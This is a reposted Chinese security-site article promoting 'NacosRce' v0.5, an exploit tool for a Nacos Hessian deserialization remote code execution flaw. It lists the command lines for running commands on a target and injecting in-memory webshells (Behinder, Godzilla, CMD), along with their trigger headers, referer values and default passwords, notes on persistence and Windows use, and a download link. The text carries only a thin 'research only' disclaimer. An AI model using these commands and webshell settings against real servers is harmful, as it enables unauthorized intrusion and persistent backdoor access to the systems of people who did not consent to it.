Nacos Hessian 反序列化漏洞利用工具 v0.5

admin 2023年7月9日14:17:05评论177 views字数 1047阅读3分29秒阅读模式

声明公众分享安全工具项目来自互联网仅提供安全研究学习使用用于其他目的使用者需要承包所有法律责任相关连带责任公众工具作者无关声明

使用方式

  1. 自动注入内存马并执行命令
    java -jar NacosRce.jar Url Jraft端口 "Command"
java -jar NacosRce.jar http://192.168.90.1:8848/nacos  7848 "whoami"
  1. 只注入内存马
java -jar NacosRce.jar http://192.168.90.1:8848/nacos 7848 memshell

内存马说明:

一、冰蝎内存马:

  1. 需要设置请求头x-client-data:rebeyond
  2. 设置Referer: https://www.google.com/
  3. 路径随意
  4. 密码rebeyond

二、哥斯拉内存马:

  1. 需要设置请求头x-client-data:godzilla
  2. 设置Referer: https://www.google.com/
  3. 路径随意
  4. 密码是pass 和 key

三、CMD 内存马:

  1. 需要设置请求头x-client-data:cmd 2.设置Referer: https://www.google.com/
  2. 请求头cmd:要执行的命令

v0.5版本实现了:

  1. 无法上网漏洞利用
  2. 可多次发起漏洞利用
  3. 同时注入冰蝎/哥斯拉/CMD内存马
  4. 内存马对nacos多版本进行了兼容 **tips: **
  5. 请用jdk1.8 2、适用于Nacos
  6. x <= 2.2.2
  7. 非集群的也能打哦
  8. 此内存马重启nacos仍然首先

关于Windows

Nacos Hessian 反序列化漏洞利用工具 v0.5
Nacos Hessian 反序列化漏洞利用工具 v0.5
Nacos Hessian 反序列化漏洞利用工具 v0.5

如用下面的方式执行,注入内存马时会生成临时文件 C:WindowsTempnacos_data_temp 和 C:WindowsTempnacos_data_temp.class 文件

java -jar NacosRce.jar http://192.168.90.1:8848  7848 "whoami" windows

如果没有在最后加windows,临时文件会在/tmp/nacos_data_temp /tmp/nacos_data_temp.class,所以权限就足够了,不指定windows也能打windows没打成功也许是因为没权限操作 C盘或其他原因

关于编译
遇到依赖冲突无法编译的可以使用以下方式

Nacos Hessian 反序列化漏洞利用工具 v0.5
Nacos Hessian 反序列化漏洞利用工具 v0.5

下载地址

https://github.com/c0olw/NacosRce

原文始发于微信公众号(红蓝公鸡队):Nacos Hessian 反序列化漏洞利用工具 v0.5

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月9日14:17:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Nacos Hessian 反序列化漏洞利用工具 v0.5http://cn-sec.com/archives/1858675.html

发表评论

匿名网友 填写信息